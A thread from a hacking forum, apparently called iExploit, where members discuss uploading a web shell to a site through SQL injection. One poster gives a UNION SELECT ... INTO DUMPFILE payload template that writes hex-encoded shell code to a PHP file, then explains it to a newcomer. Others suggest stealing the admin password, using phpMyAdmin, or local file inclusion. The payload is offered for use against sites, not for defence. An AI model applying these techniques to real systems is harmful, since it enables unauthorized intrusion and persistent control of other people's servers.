iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (4)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
shell Trough SQl I
  • Hardcore-Gabber
    Posts: 118
    Is possible to upload a shell toughh Sql I ??
  • antwashere
    Posts: 3
    Yes.


    ID=1 AND 1=2 UNION SELECT 0xshellcodeinhexhere INTO DUMPFILE '/some/where/shell.php'--
  • Xin
    Posts: 3,251
    said:


    Yes.


    ID=1 AND 1=2 UNION SELECT 0xshellcodeinhexhere INTO DUMPFILE '/some/where/shell.php'--


    Yeah this method, :) or take slightly longer and get the admin password then upload a shell from there
    Xin
  • hac
    Posts: 5
    With the method above, do you need to know the document root?
  • iCryptic
    Posts: 11
    Yes its possible :)
  • Xin
    Posts: 3,251
    Its also do able via phpmyadmin as well
    Xin
  • Daoboss
    Posts: 3
    said:


    Yes.


    ID=1 AND 1=2 UNION SELECT 0xshellcodeinhexhere INTO DUMPFILE '/some/where/shell.php'--



    Man I'm kinda new at this (SQLi), can you explain me what does "DUMPFILE '/some/where/shell.php'-- " mean? :|

    Thanks for your attention.
  • antwashere
    Posts: 3
    said:


    said:


    Yes.


    ID=1 AND 1=2 UNION SELECT 0xshellcodeinhexhere INTO DUMPFILE '/some/where/shell.php'--



    Man I'm kinda new at this (SQLi), can you explain me what does "DUMPFILE '/some/where/shell.php'-- " mean? :|

    Thanks for your attention.



    Put this code (0xcode) into a file (INTO DUMPFILE) at this location ('/some/where/shell.php').
  • matthew
    Posts: 5
    I was reading to that its possible to shell via Local File Intrusions hehe.
Add a Comment